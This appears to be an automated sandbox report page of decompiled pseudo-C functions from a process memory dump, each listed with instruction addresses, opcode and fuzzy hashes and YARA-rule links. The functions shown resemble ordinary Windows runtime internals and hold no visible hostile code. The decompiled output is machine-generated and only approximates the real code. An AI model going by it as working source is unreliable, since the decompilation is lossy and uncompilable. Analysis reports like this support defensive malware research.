				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E00F37D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E00FE8D34(_v8, _t80);
					}
					E00F32280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E00F2FFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E00FE8833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E00F2FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E00F5B180();
						if(_a4 != 0) {
							E00F32280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E00F3BB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E00F3BB2D(_t16, _t15);
						E00F3B944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E00F2FFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E00F2FFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E00F2FFB0(0, __ecx, _t24);
				}
				return 0;
			}

0x00f3c18d
0x00f3c18f
0x00f3c191
0x00f3c19b
0x00f3c1a0
0x00f3c1d4
0x00f3c1de
0x00f82d6e
0x00f3c1e4
0x00f3c1e4
0x00f3c1e4
0x00f3c1ec
0x00f82d7d
0x00f82d7d
0x00f3c1f3
0x00f3c1ff
0x00f82d88
0x00f82d8d
0x00f82d94
0x00f82d94
0x00f82d9f
0x00f82da4
0x00f82dab
0x00f82db0
0x00f82db2
0x00f82db3
0x00f82db4
0x00f82dbc
0x00f82dc3
0x00f82dc3
0x00f3c205
0x00f3c205
0x00f3c208
0x00f3c20e
0x00f3c211
0x00f3c216
0x00f3c219
0x00f3c21f
0x00f3c222
0x00f3c22c
0x00f3c234
0x00f3c23a
0x00f3c23f
0x00f3c245
0x00f3c24b
0x00f3c251
0x00f3c25a
0x00f3c276
0x00f3c27d
0x00f3c27d
0x00f3c25c
0x00f3c25c
0x00000000
0x00f3c25e
0x00f3c1a4
0x00f3c1aa
0x00f3c1b3
0x00f3c265
0x00f3c26c
0x00f3c26c
0x00000000

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction ID: 660fdadb7ac4459ac50b35ae4ea492d521ba870fa3fae698eff1de6ca4d629f0
Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
Instruction Fuzzy Hash: F5313972A01546BED704FBB4CC91BEAF764BF46320F14416AE41C57202DB38AA09F7D0

Uniqueness

Uniqueness Score: -1.00%

Function 00F4A70E, Relevance: .1, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00F4A70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x1007b10; // 0x0
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x1007b10 = 8;
					 *0x1007b14 = 0x1007b0c;
					 *0x1007b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x1
					E00F4A990(0x1007b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L00F4A840(__edx, __ecx, __ecx, _t52, 0x1007b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x1007b10; // 0x0
					_t3 = _t37 + 0x27; // 0x27
					__eflags = _t3 >> 5 -  *0x1007b18; // 0x0
					if(__eflags > 0) {
						_t38 =  *0x1007b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x27
						_v8 = _t4 >> 5;
						_t50 = L00F34620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x1007b18 = _v8;
						_t8 = _t52 + 7; // 0x7
						E00F5F3E0(_t50,  *0x1007b14, _t8 >> 3);
						_t28 =  *0x1007b14; // 0x0
						__eflags = _t28 - 0x1007b0c;
						if(_t28 != 0x1007b0c) {
							L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x8
						 *0x1007b14 = _t50;
						_t48 = _v12;
						 *0x1007b10 = _t9;
						goto L6;
					}
					 *0x1007b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}

0x00f4a713
0x00f4a714
0x00f4a717
0x00f4a71d
0x00f4a720
0x00f4a722
0x00f4a727
0x00f4a74a
0x00f4a754
0x00f4a75e
0x00f4a768
0x00f4a76a
0x00f4a773
0x00f4a78b
0x00f4a790
0x00f4a792
0x00f4a741
0x00f4a741
0x00f4a743
0x00f4a749
0x00f4a749
0x00f4a732
0x00f4a73a
0x00f4a797
0x00f4a79d
0x00f4a7a3
0x00f4a7a9
0x00f4a7b6
0x00f4a7bc
0x00f4a7ca
0x00f4a7e0
0x00f4a7e2
0x00f4a7e4
0x00f89bf2
0x00000000
0x00f89bf2
0x00f4a7ed
0x00f4a7f2
0x00f4a800
0x00f4a805
0x00f4a80d
0x00f4a812
0x00f89c08
0x00f89c08
0x00f4a818
0x00f4a81b
0x00f4a821
0x00f4a824
0x00000000
0x00f4a824
0x00f4a7ae
0x00000000
0x00f4a7ae
0x00f4a73c
0x00f4a73e
0x00000000

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df97568c9c742502eb57025c3260e436904ed9e32c1e7e966027dc362e7e39a3
Instruction ID: e4ef9f1c0f8be79313727536edeab2160ab0568d0d88fa584d1005a28b191d99
Opcode Fuzzy Hash: df97568c9c742502eb57025c3260e436904ed9e32c1e7e966027dc362e7e39a3
Instruction Fuzzy Hash: 4A31D0B1600A049FD722DF08DCA1F657BF9FB84720F94095AE6C587244D37EB941DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00F461A0, Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E00F461A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E00F45E50(0xef67cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E00FE9D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E00F1F7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}

0x00f461b3
0x00f461b5
0x00f461bd
0x00f461c3
0x00f461c7
0x00f461d2
0x00f461ff
0x00f461ff
0x00f46201
0x00f46207
0x00f46207
0x00f461d4
0x00f461d9
0x00000000
0x00000000
0x00f461df
0x00f461e2
0x00000000
0x00000000
0x00f461e6
0x00f461e8
0x00f461ee
0x00f461ee
0x00f461f9
0x00f8762f
0x00f87632
0x00f87635
0x00f87639
0x00f87640
0x00f8766e
0x00f87675
0x00000000
0x00000000
0x00f87681
0x00f87689
0x00f8768d
0x00f87691
0x00f87695
0x00f87699
0x00f876af
0x00f876b5
0x00f876b7
0x00f876b7
0x00f876d7
0x00f876dc
0x00000000
0x00f876dc
0x00f876a2
0x00f876a9
0x00f87651
0x00f87653
0x00f87653
0x00f87656
0x00f87656
0x00000000
0x00f87656
0x00f87644
0x00f87646
0x00f87648
0x00f87648
0x00000000
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a01a97292f93df0a5fa1ee8d71774436a7a5256c55b8a884ffb1494c32829dc7
Instruction ID: 75b1ecd8475590f77975967848166565aaf6e745cd36c60b57d7820bf5033ae2
Opcode Fuzzy Hash: a01a97292f93df0a5fa1ee8d71774436a7a5256c55b8a884ffb1494c32829dc7
Instruction Fuzzy Hash: 79317C72A097018FD324EF19C800B66BBE4FB88B10F15496DE998D7391E7B0DD04EB92

Uniqueness

Uniqueness Score: -1.00%

Function 00F1AA16, Relevance: .1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00F1AA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x100d360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x1007b9c; // 0x0
					_t53 = L00F34620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E00F5B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E00F5F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L00F26C59(_t53, _t51, _t58) != 0) {
							_t28 = E00F45E50(0xefc338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E00F4B230(_v32, _v28, 0xefc2d8, 1,  &_v24);
								_t28 = E00F1F7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}

0x00f1aa25
0x00f1aa29
0x00f1aa2d
0x00f1aa30
0x00f1aa37
0x00f1aa3c
0x00f74458
0x00f74458
0x00f74472
0x00f74474
0x00f74476
0x00f1aa64
0x00f1aa74
0x00f7447c
0x00f74483
0x00f74492
0x00f1aa52
0x00f1aa54
0x00f1aa5e
0x00f744a8
0x00f744ad
0x00f744af
0x00f744b6
0x00f744b6
0x00f744b9
0x00f744bc
0x00f744cd
0x00f744d3
0x00f744d6
0x00f744e1
0x00f744e1
0x00f744e6
0x00f744e8
0x00f744fb
0x00f744fb
0x00f744e8
0x00000000
0x00f1aa5e
0x00f74476
0x00f1aa42
0x00f1aa46
0x00f1aa48
0x00f1aa4c
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76039ff9681d7b42e51458e53854b5fac6f691d1f08728cde64397725de48b4b
Instruction ID: 4c79e862a470abbf72e13a3aab58d01d23b0bfd549e6a71687eeea4bcf97b409
Opcode Fuzzy Hash: 76039ff9681d7b42e51458e53854b5fac6f691d1f08728cde64397725de48b4b
Instruction Fuzzy Hash: 3231E571A00619EBCB11EF64CD42ABFB7B9EF04710F10406AF905E7141E779AD51EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00F58EC7, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00F58EC7(void* __ecx, void* __edx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				signed int* _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				char* _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				intOrPtr _v152;
				char _v156;
				intOrPtr _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x100d360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E00F44E70(0x10086e4, 0xf59490, 0, 0);
					if( *0x10053e8 > 5 && E00F58F33(0x10053e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x10053e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x10053e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0xefbc46;
						_t48 = E00F97B9C(0x10053e8, 0xefbc46, _t67, 0x10053e8, _t70,  &_v140);
					}
				}
				return E00F5B640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}

0x00f58ec7
0x00f58ed9
0x00f58edc
0x00f58ee6
0x00f58ee9
0x00f58eee
0x00f58efc
0x00f58f08
0x00f91349
0x00f91353
0x00f9135d
0x00f91366
0x00f9136f
0x00f91375
0x00f9137c
0x00f91385
0x00f91390
0x00f91391
0x00f9139c
0x00f9139d
0x00f913a6
0x00f913ac
0x00f913b2
0x00f913b5
0x00f913bc
0x00f913bf
0x00f913c2
0x00f913c5
0x00f913c8
0x00f913cb
0x00f913ce
0x00f913d1
0x00f913d4
0x00f913d7
0x00f913da
0x00f913dd
0x00f913e0
0x00f913e3
0x00f913e6
0x00f913e9
0x00f913f6
0x00f91400
0x00f91400
0x00f58f08
0x00f58f32

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d77e4cc35e040233fe52dfc30be46633aeb3d90f2b294988b353dd0afc6661e
Instruction ID: 8970dbc29e48e5cc78fbbe7d9766a1d2c68ae0ef3e7024a104af572118079ffa
Opcode Fuzzy Hash: 9d77e4cc35e040233fe52dfc30be46633aeb3d90f2b294988b353dd0afc6661e
Instruction Fuzzy Hash: B54190B1D003189FDB24CFAAD981AADFBF4FB48710F5081AEE549A7240EB745A85DF50

Uniqueness

Uniqueness Score: -1.00%

Function 00F54A2C, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00F54A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x100d360 ^ _t62;
				_v8 =  *0x100d360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E00F32280(_t26, 0x1008608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E00F2FFB0(_t41, _t51, 0x1008608);
						L2:
						 *0x100b1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E00F5B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E00F32280(_t28, 0x1008608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E00F2FFB0(_t42, _t53, 0x1008608);
							if(_t53 != 0) {
								L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E00F2FFB0(_t41, _t51, 0x1008608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}

0x00f54a2c
0x00f54a34
0x00f54a3c
0x00f54a3e
0x00f54a48
0x00f54a4b
0x00f54a4d
0x00f54a51
0x00f54a9c
0x00000000
0x00000000
0x00f54aa3
0x00f54aa8
0x00f54aad
0x00f54ab1
0x00f54ade
0x00f54ae3
0x00f54a5a
0x00f54a62
0x00f54a6a
0x00f54a6e
0x00f8f203
0x00f54a84
0x00f54a88
0x00f54a89
0x00f54a8a
0x00f54a95
0x00f54a95
0x00f54a79
0x00f54a80
0x00f54af2
0x00f54af4
0x00f54af9
0x00f54aff
0x00f54b01
0x00f54b03
0x00f54b08
0x00f8f20a
0x00f8f212
0x00f8f216
0x00f8f216
0x00f54b08
0x00f54b13
0x00f54b1a
0x00f8f229
0x00f8f229
0x00f54b1a
0x00f54a82
0x00000000
0x00f54a82
0x00f54ab7
0x00f54acd
0x00f54acd
0x00f54ad5
0x00f54ada
0x00000000
0x00f54ada
0x00f54ac2
0x00f54acb
0x00000000
0x00000000
0x00000000
0x00f54acb
0x00f54a53
0x00f54a53
0x00f54a58
0x00000000

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e46515171dd1262a9ed90b95d56183a0b6769ab44315cbc6ad8ddb121fc4cd5
Instruction ID: 3725904081df9ce9e224d414647a1f905ea27f474bf20e03f6f3e619721fc961
Opcode Fuzzy Hash: 7e46515171dd1262a9ed90b95d56183a0b6769ab44315cbc6ad8ddb121fc4cd5
Instruction Fuzzy Hash: 1D313232A413509BC762AF14CD41B2BBBA4FFC5B29F114529FE564B241C778EC88EB85

Uniqueness

Uniqueness Score: -1.00%

Function 00F4E730, Relevance: .1, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E00F4E730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E00F59670() < 0) {
					L00F6DF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x1007b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L00F34620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M00F4E810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

0x00f4e730
0x00f4e736
0x00f4e738
0x00f4e73d
0x00f4e73e
0x00f4e740
0x00f4e749
0x00f4e765
0x00f4e76a
0x00f4e76b
0x00f4e76c
0x00f4e76d
0x00f4e76e
0x00f4e76f
0x00f4e775
0x00f4e777
0x00f4e77e
0x00f8b675
0x00f4e784
0x00f4e784
0x00f4e789
0x00f4e7a8
0x00f4e7ac
0x00f4e807
0x00f4e7ae
0x00f4e7ae
0x00f4e7b1
0x00f4e7b4
0x00f4e7b9
0x00f4e7c0
0x00f4e7c4
0x00f4e7ca
0x00f4e7cc
0x00000000
0x00f4e7d3
0x00f4e7d6
0x00000000
0x00000000
0x00f4e7ff
0x00f4e802
0x00000000
0x00000000
0x00f4e7f9
0x00f4e7fc
0x00000000
0x00000000
0x00f4e7f3
0x00f4e7f6
0x00000000
0x00000000
0x00f4e7ed
0x00f4e7f0
0x00000000
0x00000000
0x00f4e7e7
0x00f4e7ea
0x00000000
0x00000000
0x00f8b685
0x00f8b688
0x00000000
0x00000000
0x00f8b682
0x00000000
0x00000000
0x00f4e7cc
0x00f4e7d9
0x00f4e7dc
0x00f4e7de
0x00f4e7de
0x00f4e7ac
0x00f4e7e4
0x00f4e74b
0x00f4e751
0x00f4e759
0x00f4e761
0x00f4e761

Memory Dump Source

Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6da2c49c718734c3d6deb7c4a212b3e4b412067cadfe476bf650f9574198a3e
Instruction ID: ca31999c09d3fd95e025b90c424616d39893159c49ec4bfd490d55890f16088d
Opcode Fuzzy Hash: c6da2c49c718734c3d6deb7c4a212b3e4b412067cadfe476bf650f9574198a3e
Instruction Fuzzy Hash: 8C315C75A14249AFD744CF68D841F9ABBE4FB09324F148256FD14CB341D675ED80DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00F4BC2C, Relevance: .1, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E00F4BC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x1006100; // 0x5
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E00F32280(0xd, 0x501f1a0);
				_t41 =  *0x10060f8; // 0x0
				if(_t41 != 0) {
					 *0x10060f8 =  *_t41;
					 *0x10060fc =  *0x10060fc + 0xffff;
				}
				E00F2FFB0(_t41, 0x800, 0x501f1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x10060f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L00F34620(0x1006100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x1006100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
